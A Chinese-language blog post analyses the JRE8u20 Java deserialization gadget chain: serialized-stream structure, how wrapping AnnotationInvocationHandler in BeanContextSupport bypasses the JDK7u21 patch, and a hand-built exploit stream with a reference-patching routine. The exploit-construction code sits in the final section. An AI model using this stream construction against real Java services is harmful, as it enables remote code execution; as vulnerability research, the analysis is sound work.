<!DOCTYPE html>
<html lang=zh-CN>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        JRE8u20 反序列化利用链及序列化流构造技术分析 - undefined
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>

    









<meta name="generator" content="Hexo 6.3.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> 常记常新 </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.jpg" />
        </div>
        <div class="name">
            <i>LH</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/collect/">
                    <i class="iconfont icon-shoucang1"></i>
                    <span>收藏</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E5%BA%8F%E5%88%97%E5%8C%96%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86"><span class="toc-text">0x01 序列化相关知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%8C%96%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84"><span class="toc-text">序列化数据结构</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%BF%87%E7%A8%8B"><span class="toc-text">反序列化过程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="toc-text">0x02 漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%8F%82%E8%80%83%E5%8F%8A%E5%BC%95%E7%94%A8"><span class="toc-text">0x03 参考及引用</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i> 常记常新 </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        JRE8u20 反序列化利用链及序列化流构造技术分析
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2021-05-20 23:19:21</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#漏洞分析" title="漏洞分析">漏洞分析</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content no-indent">
        <pre><code>本文首发于先知社区:https://xz.aliyun.com/t/9566
</code></pre>
<p>近期出现了一些需要基于序列化数据进行修改加以利用的漏洞，例如Weblogic的CVE-2021-2211（基于JDK8u21）、OFBiz的CVE-2021-30128，在构造POC时都需要直接对序列化数据进行修改，而JDK8u20这条链无疑是一个非常好的用来学习这方面知识的例子，因此在诸位前辈的文章指引下，再详细的记录一下这条利用链的一些细节和思路。</p>
<h2 id="0x01-序列化相关知识"><a href="#0x01-序列化相关知识" class="headerlink" title="0x01 序列化相关知识"></a>0x01 序列化相关知识</h2><h3 id="序列化数据结构"><a href="#序列化数据结构" class="headerlink" title="序列化数据结构"></a>序列化数据结构</h3><p>以这段代码为例</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">AuthClass</span> <span class="variable">authClass</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">AuthClass</span>(<span class="string">&quot;123456&quot;</span>);</span><br><span class="line"><span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;./authClass.bin&quot;</span>));</span><br><span class="line">oos.writeObject(authClass);</span><br><span class="line">oos.writeObject(authClass);</span><br><span class="line">oos.close();</span><br></pre></td></tr></table></figure>

<p>将同一个对象执行两次writeObject，序列化数据经过SerializationDumper处理如下，其中new_handle的值是SerializationDumper标注出的，实际并不存在。</p>
<p><img src="/img/jdk8u20/image_UGig8QCef0.png"></p>
<p>序列化数据内容依次如下：</p>
<ul>
<li>STREAM_MAGIC 数据头 0xaced</li>
<li>STREAM_VERSION 序列化数据版本呢 0x0005</li>
<li>TC_OBJECT 0x73 表示接下来的序列化数据是一个object，用0x73表示，除了Object，还有TC_REFERENCE、TC_STRING等，具体可见java.io.ObjectStreamConstants，分别表示接下来不同的数据类型，对应不同的处理方法。<ul>
<li>TC_CLASSDESC 0x72类的描述符 标识接下来是类的一些属性以及信息等等信息<ul>
<li>Length 0x00 30 类名长度</li>
<li>Value 0x79736f73657269616c2e7061796c6f6164732e7765626c6f6769635f686967682e74657374243141757468436c617373 类名</li>
<li>serialVersionUID  0x00 00 00 00 00 00 00 64序列化数据ID</li>
<li>newHandle 0x00 7e 00 00 这个是SerializationDumper手动添加的，实际的序列化数据中不存在这个值，便于后续计算REFERENCE</li>
<li>classDescFlags 0x02 类描述符标记，一个单位标记符</li>
<li>fieldCount 0x0001 对象的成员属性的数量</li>
<li>Fields 对象的成员属性(包含了属性名及属性类型)<ul>
<li>Object 0x4c 标识成员类的种类，除了L(0x4c)还有B(Byte)、C(char)等。</li>
<li>Length 0x0008 成员名长度</li>
<li>Value 0x70617373776f7264 成员名</li>
<li>TC_STRING  0x74成员类型<ul>
<li>newHandle 0x00 7e 00 01 第二个handle</li>
<li>Length 0x00 12 长度</li>
<li>Value 0x4c6a6176612f6c616e672f537472696e673b</li>
</ul>
</li>
</ul>
</li>
<li>TC_ENDBLOCKDATA 0x78 标识一个类结束</li>
<li>superClassDesc 0x70父类的类描述</li>
</ul>
</li>
<li>classdata 类的成员变量的值<ul>
<li>TC_STRING 0x74  字符串类型</li>
<li>newHandle 0x00 7e 00 03 值对应的handle&amp;#x20;</li>
<li>Value 0x313233343536 成员变量的值</li>
</ul>
</li>
<li>TC_REFERENCE  0x71 第二个对象，是个reference类型<ul>
<li>Handle 0x00 7e 00 02 handle的地址</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>一共出现了4个handle，用readObject读取这四个handle标识的对象</p>
<p>0x007e0000 ysoserial.payloads.weblogic_high.test$1AuthClass.class 的ObjectStreamClass对象，对应TC_CLASSDESC的内容</p>
<p>0x007e0001 char[]对象，标识成员属性（password）的类型</p>
<p>0x007e0002 ysoserial.payloads.weblogic_high.test$1AuthClass.class对象</p>
<p>0x007e0003 ysoserial.payloads.weblogic_high.test$1AuthClass.passsword的值</p>
<p><img src="/img/jdk8u20/image_tOf1ka2DUT.png"></p>
<p>通过reference，可以实现在readObject时，反序列化任意已经序列化过的对象，以及它们的一些字段。</p>
<h3 id="反序列化过程"><a href="#反序列化过程" class="headerlink" title="反序列化过程"></a>反序列化过程</h3><p>在一个类被反序列化的过程中，会经历defaultReadFields过程。用来初始化序列化数据中的Fields字段中的内容。在hashSet的反序列化过程中，它是不存在任何field的，因此不会反序列化。但是可以通过在序列化的数据中加入field内容，从而迫使它在readFields时去反序列化类。并放在类描述符的fields字段中。</p>
<h2 id="0x02-漏洞原理"><a href="#0x02-漏洞原理" class="headerlink" title="0x02 漏洞原理"></a>0x02 漏洞原理</h2><p>jdk8u20这条链是jdk7u21的绕过。jdk7u21的补丁中，在AnnotationInvocationHandler的readObject方法中，增加了对代理类的判断，要求必须为annotation类型，否则会报错。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(ObjectInputStream var1)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        var1.defaultReadObject();</span><br><span class="line">        <span class="type">AnnotationType</span> <span class="variable">var2</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            var2 = AnnotationType.getInstance(<span class="built_in">this</span>.type);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IllegalArgumentException var9) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvalidObjectException</span>(<span class="string">&quot;Non-annotation type in annotation serial stream&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="type">Map</span> <span class="variable">var3</span> <span class="operator">=</span> var2.memberTypes();</span><br><span class="line">        <span class="type">Iterator</span> <span class="variable">var4</span> <span class="operator">=</span> <span class="built_in">this</span>.memberValues.entrySet().iterator();</span><br></pre></td></tr></table></figure>

<p>虽然增加了检测，但是检测出现在defaultReadObject之前，在报错之前AnnotationInvocationHandler对象还是被正常还原了。</p>
<p><img src="/img/jdk8u20/image_mQbX_L5smA.png"></p>
<p>而jdk7u21的利用中不需要用到AnnotationInvocationHandler后需的操作，只需要这个对象被正确还原即可。因此现在的思路是，通过一个包裹类，它的readObject方法中会调用readObject方法， 并且catch了异常，使得AnnotationInvocationHandler被顺利反序列化，并在后续被用上。</p>
<p>JDK7u21的利用链如下，分别反序列化两个类，然后在put的方法中触发proxy的invoke。补丁打在了</p>
<p>第二个对象—handler的反序列化过程中。</p>
<p>![](img&#x2F;jdk8u20&#x2F;未命名文件 (1)_CW5bH-ug9v.jpg)</p>
<p>JDK8u20这条链的思路是增加一个不存在的field字段，这个字段中是一个序列化类，它包裹住AnnotationInvocationHandler，catch住AnnotationInvocationHandler反序列化过程中的异常，并且在后续的反序列化中不报错，它会被正常反序列化。然后在需要AnnotationInvocationHandler的时候，替换为之前field反序列化中生成的AnnotationInvocationHandler的reference。</p>
<p>这个field字段可以加在两个地方，一个是HashSet的field字段，另一个是hashSet的成员的field。jdk8的利用链使用的包裹类为java.beans.beancontext.BeanContextSupport类。</p>
<p>![](img&#x2F;jdk8u20&#x2F;未命名文件 (2)_uyEhwPsank.jpg)</p>
<p>![](img&#x2F;jdk8u20&#x2F;未命名文件 (3)_jGaKF4-QWo.jpg)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">synchronized</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(ObjectInputStream ois)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">synchronized</span>(BeanContext.globalHierarchyLock) &#123;</span><br><span class="line">        ois.defaultReadObject();</span><br><span class="line"></span><br><span class="line">        initialize();</span><br><span class="line"></span><br><span class="line">        bcsPreDeserializationHook(ois);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (serializable &gt; <span class="number">0</span> &amp;&amp; <span class="built_in">this</span>.equals(getBeanContextPeer()))</span><br><span class="line">            readChildren(ois);</span><br><span class="line"></span><br><span class="line">        deserialize(ois, bcmListeners = <span class="keyword">new</span> <span class="title class_">ArrayList</span>(<span class="number">1</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">final</span> <span class="keyword">void</span> <span class="title function_">readChildren</span><span class="params">(ObjectInputStream ois)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="type">int</span> <span class="variable">count</span> <span class="operator">=</span> serializable;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span> (count-- &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="type">Object</span>                      <span class="variable">child</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">            BeanContextSupport.<span class="type">BCSChild</span> <span class="variable">bscc</span>  <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                child = ois.readObject();</span><br><span class="line">                bscc  = (BeanContextSupport.BCSChild)ois.readObject();</span><br><span class="line">            &#125; <span class="keyword">catch</span> (IOException ioe) &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125; <span class="keyword">catch</span> (ClassNotFoundException cnfe) &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            <span class="keyword">synchronized</span>(child) &#123;</span><br><span class="line">                <span class="type">BeanContextChild</span> <span class="variable">bcc</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">try</span> &#123;</span><br><span class="line">                    bcc = (BeanContextChild)child;</span><br><span class="line">                &#125; <span class="keyword">catch</span> (ClassCastException cce) &#123;</span><br><span class="line">                    <span class="comment">// do nothing;</span></span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> (bcc != <span class="literal">null</span>) &#123;</span><br><span class="line">                    <span class="keyword">try</span> &#123;</span><br><span class="line">                        bcc.setBeanContext(getBeanContextPeer());</span><br><span class="line"></span><br><span class="line">                       bcc.addPropertyChangeListener(<span class="string">&quot;beanContext&quot;</span>, childPCL);</span><br><span class="line">                       bcc.addVetoableChangeListener(<span class="string">&quot;beanContext&quot;</span>, childVCL);</span><br><span class="line"></span><br><span class="line">                    &#125; <span class="keyword">catch</span> (PropertyVetoException pve) &#123;</span><br><span class="line">                        <span class="keyword">continue</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                childDeserializedHook(child, bscc);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到在readObject方法中调用了ois.defaultReadObject();并接着调用readChildren方法处理流，这个方法中进行了readObject，并且catch了异常。</p>
<p>对照jdk7u21生成的序列化数据进行构造，同时参考这条链的发现者的思路进行构造，<a target="_blank" rel="noopener" href="https://github.com/pwntester/JRE8u20_RCE_Gadget/blob/master/src/main/java/ExploitGenerator.java" title="https://github.com/pwntester/JRE8u20_RCE_Gadget/blob/master/src/main/java/ExploitGenerator.java">https://github.com/pwntester/JRE8u20_RCE_Gadget&#x2F;blob&#x2F;master&#x2F;src&#x2F;main&#x2F;java&#x2F;ExploitGenerator.java</a>，在构造中需要注意一个点：AnnotationInvocationHandler有一个成员属性，memberValues，是一个map类型，在jdk7u21中，是这样构造的，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">HashMap</span> <span class="variable">map</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">map.put(zeroHashCodeStr, templates); </span><br></pre></td></tr></table></figure>

<p>但在jdk8u20中，pwntester是这样构造的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">HashMap</span> <span class="variable">map</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">map.put(<span class="string">&quot;f5a5a608&quot;</span>, <span class="string">&quot;f5a5a608&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>初看时很奇怪，这条链这样也能触发吗？经过实际的构造后理解了作者的用意。这条链在触发中确实需要这个map的值为templates对象，但是如果直接设成templates，由于这个templates已经在HashSet中put过一次，因此会在序列化数据中留下大量的TC_REFERENCE引用，还会出现多次引用等情况，导致构造时很乱。但是像作者这样设置成和key相同的值时可以正确触发吗？其实是不能的，但是由于在put时设置为键和值相同的值，序列化数据中值被序列化时不会直接存储，而是存储成一个TC_REFERENCE，指向key，然后作者修改了这个引用，修改为指向之前hashSet在put时生成templates对象，从而避免了大量的TC_REFERENCE修改。因此作者选择在初始化第二个类的时候才放入恶意类到field中。最终生成的数据，以及对引用的修改如下，跟原作者略有不同。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line">         Object[]  ser =<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;</span><br><span class="line">            STREAM_MAGIC,</span><br><span class="line">            STREAM_VERSION,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//linkedHashset</span></span><br><span class="line">            TC_OBJECT,</span><br><span class="line">            TC_CLASSDESC,</span><br><span class="line">             LinkedHashSet.class.getName(),</span><br><span class="line">             -<span class="number">2851667679971038690L</span>,<span class="comment">//serID</span></span><br><span class="line">             (<span class="type">byte</span>)SC_SERIALIZABLE,<span class="comment">//classDescFlags</span></span><br><span class="line">             (<span class="type">short</span>)<span class="number">0</span>,</span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line"></span><br><span class="line">             TC_CLASSDESC,</span><br><span class="line">             <span class="string">&quot;java.util.HashSet&quot;</span>,-<span class="number">5024744406713321676L</span>,</span><br><span class="line">             (<span class="type">byte</span>)(SC_SERIALIZABLE|SC_WRITE_METHOD),</span><br><span class="line">             (<span class="type">short</span>)<span class="number">0</span>,<span class="comment">//fieldCount</span></span><br><span class="line"></span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line">             TC_NULL,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//hashSet readObject</span></span><br><span class="line">             TC_BLOCKDATA,</span><br><span class="line">             (<span class="type">byte</span>) <span class="number">12</span>,</span><br><span class="line">             (<span class="type">short</span>)<span class="number">0</span>,</span><br><span class="line"></span><br><span class="line">             (<span class="type">short</span>)<span class="number">16</span>,</span><br><span class="line"></span><br><span class="line">             (<span class="type">short</span>)<span class="number">16192</span>,(<span class="type">short</span>)<span class="number">0</span>,(<span class="type">short</span>)<span class="number">0</span>,</span><br><span class="line">             (<span class="type">short</span>)<span class="number">2</span>,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//first</span></span><br><span class="line">             templates,</span><br><span class="line"></span><br><span class="line">            <span class="comment">//second</span></span><br><span class="line">             TC_OBJECT,</span><br><span class="line">             TC_PROXYCLASSDESC,</span><br><span class="line">             <span class="number">1</span>,</span><br><span class="line">             Templates.class.getName(),</span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line">             TC_CLASSDESC,</span><br><span class="line">             Proxy.class.getName(),</span><br><span class="line">             -<span class="number">2222568056686623797L</span>,</span><br><span class="line">             SC_SERIALIZABLE,</span><br><span class="line">             (<span class="type">short</span>)<span class="number">2</span>,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//fake</span></span><br><span class="line">             (<span class="type">byte</span>)<span class="string">&#x27;L&#x27;</span>,<span class="string">&quot;fake&quot;</span>, TC_STRING,<span class="string">&quot;Ljava/beans/beancontext/BeanContextSupport;&quot;</span>,</span><br><span class="line">             (<span class="type">byte</span>)<span class="string">&#x27;L&#x27;</span>,<span class="string">&quot;h&quot;</span>,TC_STRING,<span class="string">&quot;Ljava/lang/reflectInvocationHandler;&quot;</span>,</span><br><span class="line">             TC_ENDBLOCKDATA,TC_NULL,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//classData</span></span><br><span class="line">             TC_OBJECT,</span><br><span class="line">             TC_CLASSDESC,</span><br><span class="line">             BeanContextSupport.class.getName(),</span><br><span class="line">             -<span class="number">4879613978649577204L</span>,</span><br><span class="line">             (<span class="type">byte</span>)(SC_SERIALIZABLE | SC_WRITE_METHOD),</span><br><span class="line">             (<span class="type">short</span>)<span class="number">1</span>,</span><br><span class="line">             (<span class="type">byte</span>)<span class="string">&#x27;I&#x27;</span>,<span class="string">&quot;serializable&quot;</span>,</span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//super class</span></span><br><span class="line">             TC_CLASSDESC,</span><br><span class="line">             BeanContextChildSupport.class.getName(),</span><br><span class="line">             <span class="number">6328947014421475877L</span>,</span><br><span class="line">             SC_SERIALIZABLE,</span><br><span class="line">             (<span class="type">short</span>)<span class="number">1</span>,</span><br><span class="line">             (<span class="type">byte</span>)<span class="string">&#x27;L&#x27;</span>,<span class="string">&quot;beanContextChildPeer&quot;</span>,</span><br><span class="line">             TC_STRING,<span class="string">&quot;Ljava/beans/beancontext/BeanContextChild;&quot;</span>,</span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line">             TC_NULL,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//classdata</span></span><br><span class="line">             TC_REFERENCE,baseWireHandle+<span class="number">25</span>, <span class="comment">//beanContextChildPeer</span></span><br><span class="line">             <span class="number">1</span>, <span class="comment">//serializable</span></span><br><span class="line"></span><br><span class="line">             <span class="comment">//readChildren</span></span><br><span class="line">             TC_OBJECT,</span><br><span class="line">             TC_CLASSDESC,</span><br><span class="line">             <span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>,</span><br><span class="line">             <span class="number">6182022883658399397L</span>,       <span class="comment">// serialVersionUID</span></span><br><span class="line">             (<span class="type">byte</span>) (SC_SERIALIZABLE | SC_WRITE_METHOD),</span><br><span class="line">             (<span class="type">short</span>) <span class="number">2</span>,                  <span class="comment">// field count</span></span><br><span class="line">             (<span class="type">byte</span>) <span class="string">&#x27;L&#x27;</span>, <span class="string">&quot;memberValues&quot;</span>, TC_STRING, <span class="string">&quot;Ljava/util/Map;&quot;</span>,   <span class="comment">// memberValues field</span></span><br><span class="line">             (<span class="type">byte</span>) <span class="string">&#x27;L&#x27;</span>, <span class="string">&quot;type&quot;</span>, TC_STRING, <span class="string">&quot;Ljava/lang/Class;&quot;</span>,         <span class="comment">// type field</span></span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line">             TC_NULL,                    <span class="comment">// no superclass</span></span><br><span class="line"></span><br><span class="line">             map,                        <span class="comment">// memberValues field value</span></span><br><span class="line">             Templates.class,            <span class="comment">// type field value</span></span><br><span class="line"></span><br><span class="line">             <span class="comment">//deserialize</span></span><br><span class="line">             TC_BLOCKDATA,</span><br><span class="line">             (<span class="type">byte</span>) <span class="number">4</span>,                   <span class="comment">// block length</span></span><br><span class="line">             <span class="number">0</span>,                          <span class="comment">// no BeanContextSupport.bcmListenes</span></span><br><span class="line">             TC_ENDBLOCKDATA,</span><br><span class="line"></span><br><span class="line">             <span class="comment">//h</span></span><br><span class="line"></span><br><span class="line">             TC_REFERENCE,baseWireHandle+<span class="number">29</span>,</span><br><span class="line">             TC_ENDBLOCKDATA</span><br><span class="line"></span><br><span class="line">        &#125;;</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] patch(<span class="type">byte</span>[] bytes) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; bytes.length; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (bytes[i] == <span class="number">0x71</span> &amp;&amp; bytes[i+<span class="number">1</span>] == <span class="number">0x00</span> &amp;&amp; bytes[i+<span class="number">2</span>] == <span class="number">0x7e</span> &amp;&amp; bytes[i+<span class="number">3</span>] ==<span class="number">0x00</span>) &#123;</span><br><span class="line">            i = i + <span class="number">4</span>;</span><br><span class="line">            System.out.print(<span class="string">&quot;Adjusting reference from: &quot;</span> + bytes[i]);</span><br><span class="line">            <span class="keyword">if</span> (bytes[i] == <span class="number">1</span>) bytes[i] = <span class="number">4</span>; <span class="comment">//</span></span><br><span class="line">            <span class="keyword">if</span> (bytes[i] == <span class="number">0x0a</span>) bytes[i]=<span class="number">0x0d</span>; <span class="comment">//templates</span></span><br><span class="line">            <span class="keyword">if</span> (bytes[i] == <span class="number">2</span>) bytes[i]= <span class="number">9</span>;</span><br><span class="line"></span><br><span class="line">            System.out.println(<span class="string">&quot; to: &quot;</span> + bytes[i]);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

